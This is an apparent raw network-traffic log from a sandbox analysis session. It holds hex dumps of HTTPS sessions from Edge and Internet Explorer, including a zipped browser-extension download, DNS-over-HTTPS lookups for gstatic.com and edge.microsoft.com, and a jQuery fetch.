                                                                                                                                                                            2024-12-11 08:39:47 UTC1390INData Raw: 67 36 b6 c2 7d dd cf 6f 71 6a 3c aa 40 7e 15 06 ce 18 81 87 14 8e b0 58 44 27 7a dd 77 ac b1 b7 dc 66 ab cf 89 e9 ce a6 3c ec 05 3f 02 02 d8 27 ea 46 4f 70 bb e1 2d 44 84 4e 09 f6 ed 1b e9 1b c5 3d 68 a6 0c d9 75 0f 3f b1 8e cd 35 f6 95 bf 91 bd 1a 69 d1 42 51 b5 ee b9 e2 ce 89 50 6c 26 16 de 89 5e bc e6 c4 fd 26 da f5 e3 ce 69 10 77 1e cc c8 01 e9 9e 41 6a 55 a0 38 bc ac b1 bf 6b be 7b ba 51 77 aa c0 9b 05 fc b0 44 37 6a e6 e1 c0 0e 78 4a 7b 14 13 4f eb 10 ed ee 3f fb 8d c4 1f af b9 25 7e f2 af cb 87 f0 11 f9 c7 c7 ff c1 df c8 80 4b b7 c6 3f 03 ce 51 66 ae c1 bd e9 35 31 9c a0 54 88 27 0b eb 52 98 2c 14 76 36 e7 d3 53 74 70 f3 94 48 50 51 74 c1 6a 6c c5 02 57 75 bf ea 37 d6 5c 85 75 ff 1a de 92 f6 c3 8e 3c db 2b f4 fc 0a bf 49 4b a8 ce 14 7e 00 ce c6 ac
                                                                                                                                                                            Data Ascii: g6}oqj<@~XD'zwf<?'FOp-DN=hu?5iBQPl&^&iwAjU8k{QwD7jxJ{O?%~K?Qf51T'R,v6StpHPQtjlWu7\u<+IK~
                                                                                                                                                                            2024-12-11 08:39:47 UTC1390INData Raw: 20 98 a3 4a ae e7 0e 9d 1f 06 63 15 24 ff cb b8 61 7b a2 4e 58 74 c0 4c 09 86 ba 97 48 e8 03 c4 a9 0f ee 35 65 bd 60 e1 21 a1 18 44 a6 bd 68 e1 33 23 9a dc 91 a1 d2 1c 38 bf d3 98 ca 64 0f d9 ab 56 8f 6d 95 56 f8 a5 e3 ec 3d ef d5 2d b3 5c 3d e6 ff 3a fe 0d 19 c0 60 d4 b8 23 8f b9 88 da a3 ee df 88 f6 ec a7 9c 21 9f 2e 21 cc 81 f2 75 fd ed 12 f6 f3 fe 52 6a 9f db f0 a2 fb e9 a7 81 d4 f7 eb f5 58 53 9e 25 3f f7 32 7e 98 ff 3b 96 ae c7 fe 9f e7 2d df ff f0 9c e5 bf be 3b 4a 9f 4d 99 a9 ba 7f 9d 95 6c 74 8c da b7 42 c7 85 e0 d3 bd e4 8e ca 4d fb 56 f6 ea 5a f6 b6 f6 9f f3 77 e9 37 5f 85 df 9d ff fb bb 96 8e e7 01 8d 3f b9 f3 73 16 f3 d4 7e 18 a7 d6 fb f9 ff 5d c7 97 a1 e3 ee bb 84 8e a9 59 2c 05 d7 fa d6 5e e6 f7 e4 df 87 46 8b e9 f6 55 5f 7f fd e5 af 7f ff
                                                                                                                                                                            Data Ascii: Jc$a{NXtLH5e`!Dh3#8dVmV=-\=:`#!.!uRjXS%?2~;-;JMltBMVZw7_?s~]Y,^FU_
                                                                                                                                                                            2024-12-11 08:39:47 UTC1390INData Raw: 7f a3 9a c1 c2 43 a0 f0 9c cf 84 2c dc 6f 77 dd ff 5e 04 27 23 01 db 3b d0 22 fa fd ca c2 00 94 91 17 e4 5e bb e4 28 b3 f2 09 87 4b 75 14 8e e0 c2 6f 3a 13 0a 28 96 4a ee 0a 6a 2c 09 f3 2c c2 e9 23 6a 8c ec 09 a0 e8 96 87 84 d2 68 a5 cd ca f5 ec 0a 46 60 f9 be 7b e8 5e a6 f5 2e a5 46 6e c8 a6 db bc 01 50 4b 07 08 1d fb 12 3a a0 00 00 00 23 01 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 72 6f 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 c1 4e 1c 31 0c bd f3 15 d6 9c 8a 34 a0 65 7b 82 1b 82 55 4f 85 aa 2d 97 aa 17 6f c6 b3 58 ca 38 51 e2 00 5a
                                                                                                                                                                            Data Ascii: C,ow^'#;"^(Kuo:(Jj,,#jhF`{^.FnPK:#PK!-_locales/ro/messages.jsonUT6*g Ad/RN14e{UO-oX8QZ
                                                                                                                                                                            2024-12-11 08:39:47 UTC1390INData Raw: 56 cb 68 4b 0f 6e 3d 2c 91 9f b7 f2 c2 8f 9e 81 ed 64 91 89 5f c8 93 db ec d7 38 3e f4 ec 97 19 5a 11 ad f3 b8 82 28 3a 6c b3 ee 24 e1 50 fb 79 09 cf f1 ad 57 e9 76 70 aa 85 35 32 aa 0a 0f 41 0d 1c 63 cf 15 51 0d 8c 44 97 9c 43 b8 94 04 8f 60 5f 09 e2 4b c0 6e a2 3a 29 12 e1 86 4f 49 97 b9 92 11 e2 5a d6 16 fc 60 20 03 a5 d7 f5 68 06 5f 65 93 9a dd ad 65 97 51 8b ac 05 b4 69 a5 64 30 17 f8 1c 4a 1d 10 6c a0 02 36 20 1b 29 c2 cd 6a e6 f5 e9 55 66 60 81 a8 0e 0c 0c 22 4a e0 41 05 8c 7f 9c 57 46 cf 54 ff 32 7c 7d 9b 6e 4b 1e be a1 2b 8b 2c ea 96 fa 5c 18 5d 04 b1 51 7c 89 a2 45 6d 3a 0b 61 c3 6f a2 78 04 e6 19 c0 10 c1 b2 2f e8 63 ec 0d 6c f9 20 a0 26 d6 8b ea b0 75 64 be 5d fd c4 70 d9 3b b5 ed d4 f1 bc 8d 4d 4a b4 8e 05 bc 1a 18 57 05 34 4d 40 13 b4 28 e5
                                                                                                                                                                            Data Ascii: VhKn=,d_8>Z(:l$PyWvp52AcQDC`_Kn:)OIZ` h_eeQid0Jl6 )jUf`"JAWFT2|}nK+,\]Q|Em:aox/cl &ud]p;MJW4M@(
                                                                                                                                                                            2024-12-11 08:39:47 UTC1390INData Raw: c1 98 b9 ab 80 ac 82 c5 04 63 89 63 38 bd 2a 36 1c e9 9a 44 2a 3c 4e 2d ee 92 46 8e 50 dc e3 94 bb f5 61 c2 1d cf 5c 48 24 42 49 6c 12 12 d7 49 d9 ae b5 78 32 3e ee bd 6d 14 36 10 04 42 78 75 49 e8 56 12 9a c0 f8 4e 5b 9e a8 18 48 07 60 fa c4 f3 b8 1c e9 66 42 8d 56 0a 4d 3a 20 57 32 60 3d 87 5b 12 2d 22 e5 44 56 25 e1 21 a6 58 0d e8 46 f5 04 83 06 0e 87 28 fb a4 f0 19 18 b8 02 88 01 7c 80 61 ef 0c 9c e0 24 d3 07 48 c9 09 3f e2 9c 5e e9 89 97 4b 26 3f f6 66 0d 22 cf 03 86 52 31 81 e4 3a 97 fa 54 dc fb b0 49 d9 ef a1 7d 1a 46 e5 77 f4 02 a7 fd a6 7b 35 4f fa 61 2c 0d 6e 07 7a 72 4d 94 18 5d f3 fe 4e 2c 30 9b 6d f6 54 60 d0 58 d4 81 d8 05 43 89 9b 2d 91 75 b1 84 72 e5 82 16 5a a8 d1 8f 71 28 22 a2 ed 69 03 7e 0f 3a 87 3c 26 69 4c 4d 0a 36 d7 c7 a7 16 96 fa
                                                                                                                                                                            Data Ascii: cc8*6D*<N-FPa\H$BIlIx2>m6BxuIVN[H`fBVM: W2`=[-"DV%!XF(|a$H?^K&?f"R1:TI}Fw{5Oa,nzrM]N,0mT`XC-urZq("i~:<&iLM6
                                                                                                                                                                            2024-12-11 08:39:47 UTC1390INData Raw: 74 f9 39 14 92 6f 30 19 61 42 16 3c c5 8e d8 b3 84 2e 10 d8 71 39 f8 5c 22 7b 60 27 ee 3a 3f 1a 26 6a f5 a8 f2 1f 13 ad 85 fc dd 51 24 58 d5 3c 25 19 9d fa 2b 81 d6 c7 4d 37 fd 9a e2 f2 53 ad 5f c1 c9 b9 41 f8 0f 77 84 84 39 d5 5c 7f 74 b0 dd bb 43 ac e6 be ce d5 bf df bb 77 82 1b a6 ff 9c 05 67 3a 77 fe 7a f2 5d 9a 09 4d 66 b5 8d f8 e6 d8 2d cb 4e 6d ee a3 82 48 7b c6 a8 5d b2 e8 52 97 3d e5 a5 b8 ef 36 ad cf 46 de f8 e7 8e 98 46 5f 0f 08 b5 d5 be 41 c5 77 eb e3 54 28 7a 31 07 87 c9 e3 1b f0 13 22 9f 73 e2 40 ce 5e e0 09 2d 54 01 dc 63 06 df 9b 0e c1 43 bf 5c bc 02 50 4b 07 08 c0 47 8a 9f 88 01 00 00 46 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6b 6d 2f 6d 65 73 73 61 67
                                                                                                                                                                            Data Ascii: t9o0aB<.q9\"{`':?&jQ$X<%+M7S_Aw9\tCwg:wz]Mf-NmH{]R=6FF_AwT(z1"s@^-TcC\PKGFPK!-_locales/km/messag
                                                                                                                                                                            2024-12-11 08:39:47 UTC1390INData Raw: df 74 6f 40 46 69 27 57 e6 ee 9e df fa e6 7c 6c 22 ff dc fc cd 83 bf 84 75 53 df fb 95 fb e0 a6 5b e2 f7 c1 5f 87 cb 78 0d a9 ac a4 0c 68 8e 44 f1 68 52 0e 42 cf 48 31 70 61 e4 4c d1 69 c5 a7 46 2f 04 a6 71 7a 9a be 86 7e 9a df 4a 91 d1 b6 e2 f0 34 96 a4 11 21 a4 4d e9 67 b4 5d b3 aa 52 cd 51 3d 41 bb 66 f2 ab fd 2b c2 fc 18 cf 78 47 7c 50 e9 5f 0e f0 9b c4 43 6a 2a f2 42 35 42 84 04 d7 70 02 ab 0d b5 b1 89 32 98 e2 55 e6 4f d6 3f 1c 81 d7 4f df 01 50 4b 07 08 80 81 20 9b 32 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 6b 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00
                                                                                                                                                                            Data Ascii: to@Fi'W|l"uS[_xhDhRBH1paLiF/qz~J4!Mg]RQ=Af+xG|P_Cj*B5Bp2UO?OPK 2PK!-_locales/sk/messages.jsonUT6*g Ad/


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            1192.168.2.549793172.64.41.34433648C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-11 08:39:47 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                            2024-12-11 08:39:47 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                            2024-12-11 08:39:48 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:39:47 GMT
                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                            CF-RAY: 8f042a8ccb300f5f-EWR
                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                            2024-12-11 08:39:48 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 d0 00 04 8e fa 41 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                            Data Ascii: wwwgstaticcomA)


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            2192.168.2.549792172.64.41.34433648C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-11 08:39:47 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                            2024-12-11 08:39:47 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                            2024-12-11 08:39:48 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:39:47 GMT
                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                            CF-RAY: 8f042a8cca832395-EWR
                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                            2024-12-11 08:39:48 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 14 00 04 8e fa 41 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                            Data Ascii: wwwgstaticcomA)


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            3192.168.2.549795162.159.61.34433648C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-11 08:39:47 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                            2024-12-11 08:39:47 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                            2024-12-11 08:39:48 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:39:47 GMT
                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                            CF-RAY: 8f042a8cea2443c7-EWR
                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                            2024-12-11 08:39:48 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 eb 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                            Data Ascii: wwwgstaticcom()


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            4192.168.2.549807162.159.61.34433648C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-11 08:39:48 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                            2024-12-11 08:39:48 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            5192.168.2.549806172.64.41.34433648C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-11 08:39:48 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                            2024-12-11 08:39:48 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            6192.168.2.549808172.64.41.34433648C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-11 08:39:49 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                            2024-12-11 08:39:49 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 04 65 64 67 65 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 51 00 0c 00 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                            Data Ascii: edgemicrosoftcom)QM
                                                                                                                                                                            2024-12-11 08:39:49 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:39:49 GMT
                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                            CF-RAY: 8f042a958ac6c360-EWR
                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                            2024-12-11 08:39:49 UTC468INData Raw: 00 00 81 80 00 01 00 04 00 00 00 01 04 65 64 67 65 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 01 00 01 c0 0c 00 05 00 01 00 00 0d fc 00 2d 12 65 64 67 65 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 0b 64 75 61 6c 2d 61 2d 30 30 33 36 08 61 2d 6d 73 65 64 67 65 03 6e 65 74 00 c0 30 00 05 00 01 00 00 00 28 00 02 c0 43 c0 43 00 01 00 01 00 00 00 28 00 04 0d 6b 15 ef c0 43 00 01 00 01 00 00 00 28 00 04 cc 4f c5 ef 00 00 29 04 d0 00 00 00 00 01 3e 00 0c 01 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                            Data Ascii: edgemicrosoftcom-edge-microsoft-comdual-a-0036a-msedgenet0(CC(kC(O)>:


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            7192.168.2.549832151.101.130.1374433788C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-11 08:39:51 UTC307OUTGET /jquery-3.6.3.min.js HTTP/1.1
                                                                                                                                                                            Accept: application/javascript, */*;q=0.8
                                                                                                                                                                            Referer: https://www.msn.com/?ocid=iehp
                                                                                                                                                                            Accept-Language: en-CH
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Host: code.jquery.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            2024-12-11 08:39:52 UTC612INHTTP/1.1 200 OK
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Length: 89947
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                            ETag: "28feccc0-15f5b"
                                                                                                                                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Age: 3271703
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:39:51 GMT
                                                                                                                                                                            X-Served-By: cache-lga21985-LGA, cache-ewr-kewr1740035-EWR
                                                                                                                                                                            X-Cache: HIT, HIT
                                                                                                                                                                            X-Cache-Hits: 587, 0
                                                                                                                                                                            X-Timer: S1733906392.922984,VS0,VE0
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            2024-12-11 08:39:52 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 33 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                            Data Ascii: /*! jQuery v3.6.3 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
